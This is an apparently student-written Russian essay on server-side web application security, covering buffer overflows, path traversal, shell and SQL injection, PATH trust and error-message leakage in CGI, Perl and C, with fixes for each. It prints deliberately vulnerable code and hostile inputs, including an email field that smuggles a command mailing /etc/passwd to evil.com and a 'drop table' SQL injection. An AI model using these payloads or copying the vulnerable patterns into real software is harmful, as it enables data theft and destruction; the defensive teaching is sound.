Безопасность cерверных web-приложений

Автор работы: Пользователь скрыл имя, 22 Декабря 2010 в 00:53, реферат

Описание работы

Ошибки в серверных web-приложениях коварны, от них нельзя защититься установкой межсетевого экрана, поскольку атака с их использованием производится на уровне разрешенного протокола HTTP, и даже использование дорогостоящей системы обнаружения атак на прикладном уровне мало чем поможет в предотвращении атаки на самостоятельно написанное корпоративное приложение.

Успешно же проведенная подобная атака вполне может оказаться первым шагом на пути ко взлому всей корпоративной сети.

Файлы: 1 файл

Безопасность cерверных приложений.doc

— 80.50 Кб (Скачать файл)

Безопасность cерверных web-приложений

Устанавливая  последнюю версию web-сервера, мы можем быть уверены хотя бы в том, что она не содержит очевидных ошибок, опубликованных по всей сети пару лет тому назад. На появление новых ошибок производители реагируют достаточно быстро, а задача администратора сводится к тому, чтобы быть в курсе происходящего. С серверными приложениями ситуация несколько иная – на сей раз в роли разработчика зачастую выступают владельцы сайтов, которые должны сами заботиться о безопасности приложений. Не стоит особо доверять и готовым скриптам – огромное количество ошибок обнаруживается именно в примерах, поставляемых вместе с web-серверами, а также во многих популярных скриптах.

Ошибки в серверных  web-приложениях коварны, от них нельзя защититься установкой межсетевого экрана, поскольку атака с их использованием производится на уровне разрешенного протокола HTTP, и даже использование дорогостоящей системы обнаружения атак на прикладном уровне мало чем поможет в предотвращении атаки на самостоятельно написанное корпоративное приложение.

Успешно же проведенная  подобная атака вполне может оказаться  первым шагом на пути ко взлому всей корпоративной сети.

Практически все  беды начинающих программистов проистекают из надежды на то, что пользователь будет себя вести «хорошо» и обращаться с программой именно так, как задумано автором. Это справедливо не только для CGI-приложений, но и для любого программного обеспечения, однако когда автор многочисленных утилит «для себя» решает попробовать свои силы в программировании для серверов, он немедленно попадает в другую весовую категорию. Ему может казаться, что он продолжает писать «для себя», в действительности же его потенциальными пользователями становятся все обитатели сети, а уж от них ждать снисхождения не приходится. И не стоит успокаивать себя тем, что CGI-приложения выполняются в контексте пользователя с минимальными правами – даже в хорошо сконфигурированной системе этих прав зачастую достаточно для выдачи информации, которой можно воспользоваться при взломе системы.

Поэтому особенно важно с самого начала четко представлять, какие подводные камни ожидают CGI-программиста, чтобы по возможности избежать горького опыта обучения на собственных ошибках.

Несколько слов о выборе средств разработки. Компилируемые языки, такие как C/C++, имеют некоторое преимущество в том смысле, что на сервере отсутствует исходный код приложения, а это сильно затрудняет возможность его исследования – в отличие от интерпретируемых языков (Perl, PHP, ASP и т.п.). В штатных условиях код последних также недоступен, но часто есть возможность добраться до него, используя какие-то ошибки сервера или просто находя сохраненную резервную копию. С другой стороны, исходные тексты популярных CGI-приложений и так достаточно распространены в сети, кроме того, тот же Perl имеет встроенные механизмы обеспечения безопасности выполняемых скриптов, так что нельзя априори утверждать, что программа на C будет безопасней аналогичной программы на Perl. Все дальнейшие рассуждения по большей части применимы как к компилируемым, так и к интерпретируемым программам.

В данном разделе  перечислены основные моменты, на которые  следут обращать внимание в первую очередь при разработке и аудите web-приложений. Разумеется, в каждом конкретном случае могут возникать и другие проблемные ситуации, основанные, например, на логике работы данного скрипта.

Переполнение  буфера.

Пришедшая к  нам из 70-х годов, более всего  эта ошибка характерна, конечно, для  программистов на C/C++. Программисту на Perl или Java обычно нет необходимости заботиться о ручном выделении памяти под строки, но и здесь полученная строка может быть передана дальше, внешнему приложению либо sql-серверу, так что забывать о контроле для длиной строк не стоит.

Например, для  получения данных, переданных методом POST, можно написать следующий код:

char buff [4096];

int length = atoi(getenv(“CONTENT_LENGTH"));

fread(buff, 1, length, stdin);

Возможное переполнение буфера налицо. Справиться с этой проблемой  очень легко – достаточно динамически выделить буфер требуемой длины:

int length = atoi(getenv(“CONTENT_LENGTH"));

char* buff = new char[length];

if(buff) fread(buff, 1, length, stdin);

Потенциально  опасны многие строковые функции, определяющие конец строки по завершающему нулю. Поэтому вместо функций strcpy, strcat, strcmp и т. п. настоятельно рекомендуется использовать их аналоги strncpy, strncat, strncmp, позволяющие указать максимальное количество обрабатываемых символов.

Казалось бы, можно ограничить объем вводимой информации указанием соответствующих  параметров в тэгах формы, но это еще одно очень опасное заблуждение, которого мы коснемся чуть позже.

Возможно, именно из-за необходимости постоянно контролировать размер буфера, многие начинающие (и не только) CGI-программисты предпочитают Perl.

Передача нефильтрованного пользовательского ввода внешним приложениям и функциям по работе с файлами.

Может привести к чтению либо записи в файлы, находящиеся  вне дерева документов www-сервера (если пользовательский ввод содержит нечто вроде ../../../my/secret/file), и содержащие критичную информацию, например, пользовательские пароли.

Кроме того, при  этом вполне может быть использована какая-нибудь недокументированная  команда или люк, позволяющие  выполнить код от имени привилегированного пользователя.

Под пользовательским вводом понимается как информация, полученная непосредственно из полей ввода html-формы, так и из cookie, и даже из собственной базы данных (кто знает, насколько надежно осуществлялся отсев пользовательского ввода пару лет назад, когда заполнялась эта база). Для ASP это относится также и к сессионным переменным, являющимися по сути дела теми же cooke.

Вызов внешних приложений с использованием командной оболочки.

Это частный  и весьма популярный случай рассмотренной  ранее передачи пользовательского  ввода внешним приложениям. Если в процессе вызова внешней программы будет участвовать командная оболочка, то, можно воспользоваться ее управляющими символами, передав в пользовательском вводе ее команды, скомбинированные с символами-разделителями. Т.е. фактически выполнить на сервере любую команду.

У С++ с этой точки  зрения потенциально опасны функции popen и system (причем вместо последней часто можно безболезненно воспользоваться exec или spawn), у Perl проблемными являются функции system и exec, open с перенаправлением вывода (аналогичная popen), функция eval, а также обратная кавычка «`». Аналогичные функции используются в php, в ASP же прямой аналог отсутствует – функция CreateObject, создающая объект автоматизации и в том числе служащая для вызова внешних приложений, избавлена от недостатка функций, использующих командную оболочку.

Сами по себе перечисленные функции достаточно безопасны, и, если скрипт просто вызывает некую внешнюю программу, никакой  беды в этом нет. Сложности возникают, когда скрипт передает внешней программе в качестве параметра некую информацию, введенную пользователем: адрес, сообщаемый программе электронной почты, вызов grep из поисковой системы и т. д.

Очевидный пример – отправление письма по адресу, указанному пользователем (например, в качестве подтверждения какого-то запроса и т. п.):

#!/usr/bin/perl

use CGI qw(:standard);

$query = new CGI;

$mailprog='| /usr/sbin/sendmail';

$address= $query->param(’address’);

$from=’webmaster@somehost’;

open (MAIL,"$mailprog $address");

print MAIL "From: $from\nSubject: Confirmation\n\n";

print MAIL "Your request was successfully received\n";

close MAIL;

Теперь предположим, что пользователь ввел следующий  обратный адрес: hacker@evil.com;mail hacker@evil.com </etc/passwd;

в результате чего выполнится команда /usr/sbin/sendmail hacker@evil.com;mail hacker@evil.com </etc/passwd; – явно не то, что мы ожидали.

При использовании sendmail избавиться от ошибки очень легко – достаточно применить ключ «–t», запрещающий использовать адрес, переданный в командной строке, и передать его в заголовке письма:

...

$mailprog='| /usr/sbin/sendmail -t';

open (MAIL,"$mailprog ");

print MAIL "To: $address\nFrom: $from\nSubject: Confirmation\n\n";

print MAIL "Your request was successfully received\n";

received\n";

close MAIL;

Если же никак  не удается избавиться от необходимости  передачи пользовательского ввода  оболочке, остается фильтровать в  нем все специальные символы. Этих символов довольно много: <>|&;`'\"*$?~^()[]{}\n\r.

Кроме того, при  вызове системных функций особо осторожно стоит работать с «нулевым» символом – \0. Дело в том, что для системных функций, написанных, как правило, на C, нулевой символ является признаком конца строки. Для Perl же нулевой символ вполне может оказаться частью строки. В итоге строка, которая проверяется perl-скриптом, и передается такой функции, может оказаться совсем не похожей на то, что получит функция.

Самое простое, что можно сделать, – удалить все спецсимволы из введенной строки с помощью конструкции примерно такого вида:

$metasymbols = "][<>\|&;`'\"*\$\?~\^(){}\n\r";

$string =~ s/[$metasymbols\\]//g;

Помимо этого  постарайтесь гарантировать соответствие ввода предусмотренному шаблону. Скажем, для того же почтового адреса этим шаблоном может быть name@domain1.domain2, что чаще всего делается на Perl следующим образом:

die "Wrong address" if ($address !~ /^\w[\w\-.]*\@[\w\-.]+$/);

Здесь в начале и в конце строки ожидается  один или несколько символов a-z, A-Z, 0-9, «-», «.» и «@» внутри, причем «-» или «.» не могут быть первыми. Правда, это не слишком помогает против атак, подобных приведенной выше, достаточно завершить наш псевдоадрес чем-нибудь типа ;@somewhere.ru.

Если же у  вас нет желания фильтровать  спецсимволы, можно использовать другой вариант вызова функций system и exec, позволяющий передать не один аргумент, а список аргументов. В этом случае Perl не передает список аргументов в оболочку, а рассматривает первый аргумент как подлежащую выполнению команду, и остальные аргументы – как параметры этой команды. Причем обычная для оболочки интерпретация спецсимволов не производится:

вместо system "grep $pattern $files"; использовать system "grep", "$pattern", "$files";.

Этим же свойством  можно воспользоваться для безопасного  перенаправленного ввода/вывода. При этом нам понадобится знание того факта, что при открытии с перенаправлением вывода команды «-» мы неявно вызываем fork, создавая тем самым копию нашего процесса. В такой ситуации функция open возвращает 0 для дочернего процесса и pid дочернего процесса для родительского, что позволяет применять оператор or:

open (MAIL, "|-") or exec $mailprog, $address;

    #open в родительском процессе возвращает ненулевое значение,  
    # и нет

#необходимости выполнять правую сторону or. Дочерний же процесс

#выполняет exec, после чего завершается.

print MAIL "From: $from\nSubject: Confirmation\n\n";

print MAIL "Your request was successfully received\n";

close MAIL;

Передача  нефильтрованного ввода  SQL-серверу.

Еще один частный  случай передачи нефильтрованного пользовательского  ввода, заслуживающий отдельного упоминания. Использование аналогичено предыдущему пункту – вставка в запрос символов-разделителей (как правило, «;») в сочетании с командами сервера (exec – для вызова встроенных процедур, drop table для удаления таблицы и т.п.).

Простейший пример – запрос вида select * from userbase where name=’$name’, где $name содержит пользовательский ввод. Если введено нечто вроде «anyname’;drop table ‘userbase», наш запрос преобразится в

select * from userbase where name=’anyname’;drop table ‘userbase’.

Бороться с данными ошибками довольно легко – для строковых полей достаточно проверять наличие одиночной кавычки в пользовательском вводе и замена ее на две кавычки (в Perl этого эффекта легко добиться использованием функции DBI::quote), для числовых – необходимо убедиться, что ввод представляет собой именно число (простейший способ добиться этого в Perl – добавить к полученному значению 0).

Расчет  на определенные значения специальных переменных

К примеру, на значение переменной PATH при вызове внешних программ. Нарушитель может попытаться изменить ее значение так, чтобы она указывала на программу, которую он хочет подставить для выполнения вашим сценарием вместо ожидаемой вами. Следовательно, необходимо либо указывать полный путь до исполняемой программы, либо устанавливать ее значение до первого использования. Причем не рекомендуется помещать в PATH текущий путь (данное правило, к сожалению, игнорируется во всех Windows-системах, начинающих поиск запускаемой программы именно с текущего каталога).

Вывод избыточной информации.

Например, при  выдаче сообщений об ошибках. Частенько  здесь можно получить информацию о каталогах, в которых расположены  приложения либо их модули. Неразумно  также выдавать сообщения типа «идентификатор пользователя должен состоять из 8 чисел, сгруппированных в 2 группы, разделенные дефисом».

Информация о работе Безопасность cерверных web-приложений